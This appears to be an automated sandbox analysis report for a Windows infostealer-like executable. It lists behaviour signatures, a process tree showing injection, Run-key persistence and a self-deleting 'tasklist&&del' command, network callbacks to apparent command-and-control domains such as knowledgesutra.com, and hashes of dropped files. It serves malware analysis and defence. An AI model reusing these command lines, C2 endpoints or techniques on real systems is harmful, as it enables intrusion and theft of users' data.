Analysis

  • max time kernel
    150s
  • max time network
    101s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    04/10/2022, 03:44 UTC

General

  • Target

    df999d74bf1052d031b84164e5029508528bb76feb7ec14caa6b92abd129f8a2.exe

  • Size

    840KB

  • MD5

    024ffc0a906b6ef8618e02c6349b1e61

  • SHA1

    eebb32abf9151f35345869181eb8ffb88f21fabe

  • SHA256

    df999d74bf1052d031b84164e5029508528bb76feb7ec14caa6b92abd129f8a2

  • SHA512

    00982b9809900bb2cc05592c5d03608c43823bab0f377766b476e248c0ff2716041fab3ae7c4c1a9d6527e0e483078207c15e47ec7c7fa0579372c0ee93d27d9

  • SSDEEP

    12288:gCpyvXFPTfnCvX66h/NYJ9nDW6FApNg3gZqdDUtOuBiMc/j6KRVrxn7Nl4+GtlrL:dk9P7nCvX6MNYLIbgYJ3chra+GbrL

Malware Config

Signatures

  • Modifies visibility of hidden/system files in Explorer 2 TTPs 2 IoCs
  • Executes dropped EXE 10 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 14 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 54 IoCs
  • Drops desktop.ini file(s) 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\csrss.exe
    %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
    1⤵
    • Executes dropped EXE
    • Drops desktop.ini file(s)
    • Suspicious use of UnmapMainImage
    PID:336
  • C:\Users\Admin\AppData\Local\Temp\df999d74bf1052d031b84164e5029508528bb76feb7ec14caa6b92abd129f8a2.exe
    "C:\Users\Admin\AppData\Local\Temp\df999d74bf1052d031b84164e5029508528bb76feb7ec14caa6b92abd129f8a2.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1392
    • C:\Users\Admin\AppData\Local\Temp\df999d74bf1052d031b84164e5029508528bb76feb7ec14caa6b92abd129f8a2.exe
      "C:\Users\Admin\AppData\Local\Temp\df999d74bf1052d031b84164e5029508528bb76feb7ec14caa6b92abd129f8a2.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1032
      • C:\Users\Admin\d3WQGzd9.exe
        C:\Users\Admin\d3WQGzd9.exe
        3⤵
        • Modifies visibility of hidden/system files in Explorer
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2000
        • C:\Users\Admin\zauda.exe
          "C:\Users\Admin\zauda.exe"
          4⤵
          • Modifies visibility of hidden/system files in Explorer
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          PID:2020
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c tasklist&&del d3WQGzd9.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1316
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1932
      • C:\Users\Admin\awhost.exe
        C:\Users\Admin\awhost.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1952
        • C:\Windows\SysWOW64\svchost.exe
          "C:\Windows\system32\svchost.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1368
      • C:\Users\Admin\bwhost.exe
        C:\Users\Admin\bwhost.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1328
        • C:\Users\Admin\bwhost.exe
          "C:\Users\Admin\bwhost.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:984
          • C:\Windows\explorer.exe
            0000003C*
            5⤵
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:880
      • C:\Users\Admin\cwhost.exe
        C:\Users\Admin\cwhost.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Drops file in Program Files directory
        PID:1416
        • C:\Users\Admin\cwhost.exe
          C:\Users\Admin\cwhost.exe startC:\Users\Admin\AppData\Roaming\conhost.exe%C:\Users\Admin\AppData\Roaming
          4⤵
          • Executes dropped EXE
          PID:1620
        • C:\Users\Admin\cwhost.exe
          C:\Users\Admin\cwhost.exe startC:\Users\Admin\AppData\Local\Temp\dwm.exe%C:\Users\Admin\AppData\Local\Temp
          4⤵
          • Executes dropped EXE
          PID:580
      • C:\Users\Admin\dwhost.exe
        C:\Users\Admin\dwhost.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1876
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c tasklist&&del df999d74bf1052d031b84164e5029508528bb76feb7ec14caa6b92abd129f8a2.exe
        3⤵
        • Deletes itself
        PID:1384
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:688
  • C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
    1⤵
    • Loads dropped DLL
    PID:848
  • C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    1⤵
    PID:1060

    Network

    • flag-us
      DNS
      knowledgesutra.com
      cwhost.exe
      Remote address:
      8.8.8.8:53
      Request
      knowledgesutra.com
      IN A
      Response
      knowledgesutra.com
      IN A
      67.227.226.240
    • flag-us
      GET
      http://knowledgesutra.com/img/temp/hi.cgi?v44=47&tq=gHZutDyMv5rJejHia9nrmsl6giWz%2BJZbVyA%3D
      cwhost.exe
      Remote address:
      67.227.226.240:80
      Request
      GET /img/temp/hi.cgi?v44=47&tq=gHZutDyMv5rJejHia9nrmsl6giWz%2BJZbVyA%3D HTTP/1.0
      Connection: close
      Host: knowledgesutra.com
      Accept: */*
      User-Agent: mozilla/2.0
      Response
      HTTP/1.1 200 OK
      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
      Content-Type: text/html; charset=UTF-8
      Date: Tue, 04 Oct 2022 12:23:06 GMT
      Connection: close
      X-Powered-By: PHP/5.4.16
    • flag-us
      DNS
      onlinehelptoall.com
      cwhost.exe
      Remote address:
      8.8.8.8:53
      Request
      onlinehelptoall.com
      IN A
      Response
    • flag-us
      DNS
      yourmediaspace.com
      cwhost.exe
      Remote address:
      8.8.8.8:53
      Request
      yourmediaspace.com
      IN A
      Response
    • flag-nl
      GET
      http://www.google.com/
      cwhost.exe
      Remote address:
      216.58.208.100:80
      Request
      GET / HTTP/1.0
      Connection: close
      Host: www.google.com
      Accept: */*
      Response
      HTTP/1.0 302 Found
      Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaPUcyGOfL8JkGIhAUWF52OOZeK0u8_SIL6kK9MgFy
      Date: Tue, 04 Oct 2022 12:24:07 GMT
      Pragma: no-cache
      Expires: Fri, 01 Jan 1990 00:00:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Content-Type: text/html; charset=UTF-8
      Server: HTTP server (unknown)
      Content-Length: 313
      X-XSS-Protection: 0
    • flag-us
      DNS
      onlinefilepanel.com
      cwhost.exe
      Remote address:
      8.8.8.8:53
      Request
      onlinefilepanel.com
      IN A
      Response
    • flag-nl
      GET
      http://www.google.com/
      cwhost.exe
      Remote address:
      216.58.208.100:80
      Request
      GET / HTTP/1.1
      Connection: close
      Pragma: no-cache
      Host: www.google.com
      Response
      HTTP/1.1 302 Found
      Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaPUcyGO_L8JkGIhCBsyPyca7d0HsSSS-rasgBMgFy
      Date: Tue, 04 Oct 2022 12:24:15 GMT
      Pragma: no-cache
      Expires: Fri, 01 Jan 1990 00:00:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Content-Type: text/html; charset=UTF-8
      Server: HTTP server (unknown)
      Content-Length: 313
      X-XSS-Protection: 0
      Connection: close
    • flag-nl
      GET
      http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaPUcyGO_L8JkGIhCBsyPyca7d0HsSSS-rasgBMgFy
      cwhost.exe
      Remote address:
      216.58.208.100:80
      Request
      GET /sorry/index?continue=http://www.google.com/&q=EgSaPUcyGO_L8JkGIhCBsyPyca7d0HsSSS-rasgBMgFy HTTP/1.1
      Connection: close
      Pragma: no-cache
      Host: www.google.com
      Response
      HTTP/1.1 429 Too Many Requests
      Date: Tue, 04 Oct 2022 12:24:16 GMT
      Pragma: no-cache
      Expires: Fri, 01 Jan 1990 00:00:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Content-Type: text/html
      Server: HTTP server (unknown)
      Content-Length: 2951
      X-XSS-Protection: 0
      Connection: close
    • 127.0.0.1:80
      explorer.exe
    • 127.0.0.1:80
      explorer.exe
    • 127.0.0.1:80
      explorer.exe
    • 67.227.226.240:80
      http://knowledgesutra.com/img/temp/hi.cgi?v44=47&tq=gHZutDyMv5rJejHia9nrmsl6giWz%2BJZbVyA%3D
      http
      cwhost.exe
      443 B
      2.4kB
      6
      7

      HTTP Request

      GET http://knowledgesutra.com/img/temp/hi.cgi?v44=47&tq=gHZutDyMv5rJejHia9nrmsl6giWz%2BJZbVyA%3D

      HTTP Response

      200
    • 216.58.208.100:80
      http://www.google.com/
      http
      cwhost.exe
      302 B
      931 B
      5
      5

      HTTP Request

      GET http://www.google.com/

      HTTP Response

      302
    • 127.0.0.1:61030
      cwhost.exe
    • 216.58.208.100:80
      http://www.google.com/
      http
      cwhost.exe
      307 B
      950 B
      5
      5

      HTTP Request

      GET http://www.google.com/

      HTTP Response

      302
    • 216.58.208.100:80
      http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaPUcyGO_L8JkGIhCBsyPyca7d0HsSSS-rasgBMgFy
      http
      cwhost.exe
      489 B
      3.5kB
      7
      7

      HTTP Request

      GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaPUcyGO_L8JkGIhCBsyPyca7d0HsSSS-rasgBMgFy

      HTTP Response

      429
    • 127.0.0.1:61030
      cwhost.exe
    • 8.8.8.8:53
      knowledgesutra.com
      dns
      cwhost.exe
      64 B
      80 B
      1
      1

      DNS Request

      knowledgesutra.com

      DNS Response

      67.227.226.240

    • 8.8.8.8:53
      onlinehelptoall.com
      dns
      cwhost.exe
      65 B
      138 B
      1
      1

      DNS Request

      onlinehelptoall.com

    • 8.8.8.8:53
      yourmediaspace.com
      dns
      cwhost.exe
      64 B
      64 B
      1
      1

      DNS Request

      yourmediaspace.com

    • 8.8.8.8:53
      onlinefilepanel.com
      dns
      cwhost.exe
      65 B
      138 B
      1
      1

      DNS Request

      onlinefilepanel.com

    MITRE ATT&CK Enterprise v6

    Downloads

    • C:\Users\Admin\awhost.exe

      Filesize

      68KB

      MD5

      b0406fa1f1b4a471ce4c1521708d1ef3

      SHA1

      bd2bb68d92c8b6af7604d52e336152bc48ea1227

      SHA256

      ef2abd7d609bba1f141b3e1dc6a79d937fe68e37d51b093fc29e0d800bf6fa29

      SHA512

      07bec70b25b083919a91de4930842ba8b264e869d0251134cbfecbc9227be704c70600c9db878eee08f7d1fa1df6c848577b632f810b014d62ace26b961bb2cc

    • C:\Users\Admin\bwhost.exe

      Filesize

      136KB

      MD5

      acaf206a193335d7983a46a8c9e18fea

      SHA1

      3a33b8148c23887c2b9edc2d0dbec3d83398069b

      SHA256

      8aa2fb2e061fc4a30160f912db3f1ea75189d16d922f82aba6538e92c4df47ca

      SHA512

      846622efa83273ce9f40f38953077eca4a6f064923a8cf9b202d19cac9fac4c8e58007f2531fafafb6b408787d0ed23a3349b49794d0311736efa35bba6fba10

    • C:\Users\Admin\cwhost.exe

      Filesize

      170KB

      MD5

      40d9607cb66da11b9adfec5b93b8b311

      SHA1

      55bf463cd5c0c90ba92935ef81ae47ab3bc5fea6

      SHA256

      033e60eebb966b3bcfbe27fa3e99e8f393970f320b5cc25cb16517869eb5f3e6

      SHA512

      e764053de1c2444e61e638e67e91cf7d9d968df4d60b8bcc3f5ddfc317edb1f14e950d096d451fa372a699fc886125066f4e2f2de171641433ce1e066aa58078

    • C:\Users\Admin\d3WQGzd9.exe

      Filesize

      364KB

      MD5

      db406d87e556a0008c18429ecf3cc93a

      SHA1

      3a1b7a87080bf1d78fca904bd7515833bbd380e8

      SHA256

      2712b4f742a53c7d4b9a55c8f760447a26925c10a3ca6c10b84dea49482a2768

      SHA512

      e0da870b0c8f8955277b9227ef3de2b4d3e45d37986ac9a9b445e24506f265020f071365a2135b1e2892aaa64c3b7477d6c4a57598f3601655d74d92d6222354

    • C:\Users\Admin\dwhost.exe

      Filesize

      24KB

      MD5

      aaa893d374547f20f7fdd7c3b6c56b36

      SHA1

      f7aab7bd60af5e948b71abcccbcfb1d62f6580ff

      SHA256

      17c950477ffd3e28c4135c4cc5711589415129c7b21c4af1e89deaf68f043d03

      SHA512

      491b88e809425dd20dc9052fe45ab101ccb803c186a27d6502bf1cbefa8d903d51f72c02e604ec346f77b85c4324daa036341a42fcba0a96e5c69781ebfecb31

    • C:\Users\Admin\zauda.exe

      Filesize

      364KB

      MD5

      b94829f71bf0c5842ea78aa0b976c129

      SHA1

      3c1b0d7b45ecbd2069a722ab9c1549c299c86c89

      SHA256

      cffed0c3fe5e9f34e1d9364bef53f9216cb13baae2d865e4f09a8651d864b8b2

      SHA512

      f2b72b15386d735590a3593a6adb4bd88d7acb634b6e4b3f75823e4fac11aa4c56bae222355eeb395f8c9f9c5d375fe57f76ac82fc9666a2f68f9d1a9c469384

    • C:\Windows\system32\consrv.DLL

      Filesize

      53KB

      MD5

      68689b2e7472e2cfb3f39da8a59505d9

      SHA1

      5be15784ab1193dc13ac24ec1efcabded5fe2df4

      SHA256

      f304eb2cf6479a4fb36fef81c6df4d0225e251002e8f06f26ee196210bf3d168

      SHA512

      269999061cd54b23b92d385689682e687ae9030bc5d26d79dd5e99f72fa4b4eef41f5a7b555325bd558771db92e2feb8a67fb40c87223be9e23ccb498b3bbc88

    • \Users\Admin\awhost.exe

      Filesize

      68KB

      MD5

      b0406fa1f1b4a471ce4c1521708d1ef3

      SHA1

      bd2bb68d92c8b6af7604d52e336152bc48ea1227

      SHA256

      ef2abd7d609bba1f141b3e1dc6a79d937fe68e37d51b093fc29e0d800bf6fa29

      SHA512

      07bec70b25b083919a91de4930842ba8b264e869d0251134cbfecbc9227be704c70600c9db878eee08f7d1fa1df6c848577b632f810b014d62ace26b961bb2cc

    • \Users\Admin\bwhost.exe

      Filesize

      136KB

      MD5

      acaf206a193335d7983a46a8c9e18fea

      SHA1

      3a33b8148c23887c2b9edc2d0dbec3d83398069b

      SHA256

      8aa2fb2e061fc4a30160f912db3f1ea75189d16d922f82aba6538e92c4df47ca

      SHA512

      846622efa83273ce9f40f38953077eca4a6f064923a8cf9b202d19cac9fac4c8e58007f2531fafafb6b408787d0ed23a3349b49794d0311736efa35bba6fba10

    • \Users\Admin\cwhost.exe

      Filesize

      170KB

      MD5

      40d9607cb66da11b9adfec5b93b8b311

      SHA1

      55bf463cd5c0c90ba92935ef81ae47ab3bc5fea6

      SHA256

      033e60eebb966b3bcfbe27fa3e99e8f393970f320b5cc25cb16517869eb5f3e6

      SHA512

      e764053de1c2444e61e638e67e91cf7d9d968df4d60b8bcc3f5ddfc317edb1f14e950d096d451fa372a699fc886125066f4e2f2de171641433ce1e066aa58078

    • \Users\Admin\d3WQGzd9.exe

      Filesize

      364KB

      MD5

      db406d87e556a0008c18429ecf3cc93a

      SHA1

      3a1b7a87080bf1d78fca904bd7515833bbd380e8

      SHA256

      2712b4f742a53c7d4b9a55c8f760447a26925c10a3ca6c10b84dea49482a2768

      SHA512

      e0da870b0c8f8955277b9227ef3de2b4d3e45d37986ac9a9b445e24506f265020f071365a2135b1e2892aaa64c3b7477d6c4a57598f3601655d74d92d6222354

    • \Users\Admin\dwhost.exe

      Filesize

      24KB

      MD5

      aaa893d374547f20f7fdd7c3b6c56b36

      SHA1

      f7aab7bd60af5e948b71abcccbcfb1d62f6580ff

      SHA256

      17c950477ffd3e28c4135c4cc5711589415129c7b21c4af1e89deaf68f043d03

      SHA512

      491b88e809425dd20dc9052fe45ab101ccb803c186a27d6502bf1cbefa8d903d51f72c02e604ec346f77b85c4324daa036341a42fcba0a96e5c69781ebfecb31

    • \Users\Admin\zauda.exe

      Filesize

      364KB

      MD5

      b94829f71bf0c5842ea78aa0b976c129

      SHA1

      3c1b0d7b45ecbd2069a722ab9c1549c299c86c89

      SHA256

      cffed0c3fe5e9f34e1d9364bef53f9216cb13baae2d865e4f09a8651d864b8b2

      SHA512

      f2b72b15386d735590a3593a6adb4bd88d7acb634b6e4b3f75823e4fac11aa4c56bae222355eeb395f8c9f9c5d375fe57f76ac82fc9666a2f68f9d1a9c469384

    • \Windows\System32\consrv.dll

      Filesize

      53KB

      MD5

      68689b2e7472e2cfb3f39da8a59505d9

      SHA1

      5be15784ab1193dc13ac24ec1efcabded5fe2df4

      SHA256

      f304eb2cf6479a4fb36fef81c6df4d0225e251002e8f06f26ee196210bf3d168

      SHA512

      269999061cd54b23b92d385689682e687ae9030bc5d26d79dd5e99f72fa4b4eef41f5a7b555325bd558771db92e2feb8a67fb40c87223be9e23ccb498b3bbc88

    • \Windows\assembly\GAC_32\Desktop.ini

      Filesize

      4KB

      MD5

      ff7d5ec20bf73c02317e7a740fffe018

      SHA1

      365ac8cfe5b939854cc1c341caf051bcc45f9372

      SHA256

      1e230847d7034f5ab3bf010f569315e00673859af0574fc9f915636ed905779a

      SHA512

      30854c0d703fd7c6cbc0769d9be4125baa2577ec529d5e48177a434685b66752fd79c50f0321324e23eeb985738f403347748afefae7d8a3bfad388a5b512a44

    • \Windows\assembly\GAC_64\Desktop.ini

      Filesize

      5KB

      MD5

      3e7a118b119428247edfc5d5ef3761bc

      SHA1

      140e4cb00107678160411f016c4c17611580a209

      SHA256

      97c19f4103a16798202e50a501375d0bf3d7ec1bb654dda230337e85b01b1ec5

      SHA512

      b0e27a4d7aa62f937f275b9f413f75857846ae670bf3aed6e55c1db865485fda89e33dcdffa02ae2ab25f48d5f63f869232f9e6d69f9cdc8a5c93f39de09a925

    • memory/336-145-0x0000000001F00000-0x0000000001F12000-memory.dmp

      Filesize

      72KB

    • memory/336-157-0x0000000001F00000-0x0000000001F12000-memory.dmp

      Filesize

      72KB

    • memory/580-164-0x0000000000540000-0x0000000000558000-memory.dmp

      Filesize

      96KB

    • memory/580-163-0x0000000000400000-0x0000000000449000-memory.dmp

      Filesize

      292KB

    • memory/880-132-0x0000000000060000-0x0000000000075000-memory.dmp

      Filesize

      84KB

    • memory/880-137-0x0000000001B20000-0x0000000001B39000-memory.dmp

      Filesize

      100KB

    • memory/880-131-0x0000000001B20000-0x0000000001B39000-memory.dmp

      Filesize

      100KB

    • memory/880-126-0x0000000001B20000-0x0000000001B39000-memory.dmp

      Filesize

      100KB

    • memory/984-118-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/984-114-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/984-119-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/984-120-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/984-117-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/984-124-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/984-115-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/1032-172-0x0000000002780000-0x000000000323A000-memory.dmp

      Filesize

      10.7MB

    • memory/1032-174-0x0000000000400000-0x00000000004C4000-memory.dmp

      Filesize

      784KB

    • memory/1032-67-0x0000000075601000-0x0000000075603000-memory.dmp

      Filesize

      8KB

    • memory/1032-138-0x0000000000400000-0x00000000004C4000-memory.dmp

      Filesize

      784KB

    • memory/1032-62-0x0000000000400000-0x00000000004C4000-memory.dmp

      Filesize

      784KB

    • memory/1032-57-0x0000000000400000-0x00000000004C4000-memory.dmp

      Filesize

      784KB

    • memory/1032-59-0x0000000000400000-0x00000000004C4000-memory.dmp

      Filesize

      784KB

    • memory/1032-68-0x0000000000400000-0x00000000004C4000-memory.dmp

      Filesize

      784KB

    • memory/1032-56-0x0000000000400000-0x00000000004C4000-memory.dmp

      Filesize

      784KB

    • memory/1368-100-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1368-98-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1368-101-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1368-95-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1368-94-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1368-102-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1368-105-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1368-97-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1368-106-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1416-148-0x0000000000400000-0x0000000000449000-memory.dmp

      Filesize

      292KB

    • memory/1416-159-0x00000000008D0000-0x00000000008E8000-memory.dmp

      Filesize

      96KB

    • memory/1416-158-0x0000000000400000-0x0000000000449000-memory.dmp

      Filesize

      292KB

    • memory/1416-149-0x00000000008D0000-0x00000000008E8000-memory.dmp

      Filesize

      96KB

    • memory/1620-156-0x0000000000530000-0x0000000000548000-memory.dmp

      Filesize

      96KB

    • memory/1620-155-0x0000000000400000-0x0000000000449000-memory.dmp

      Filesize

      292KB
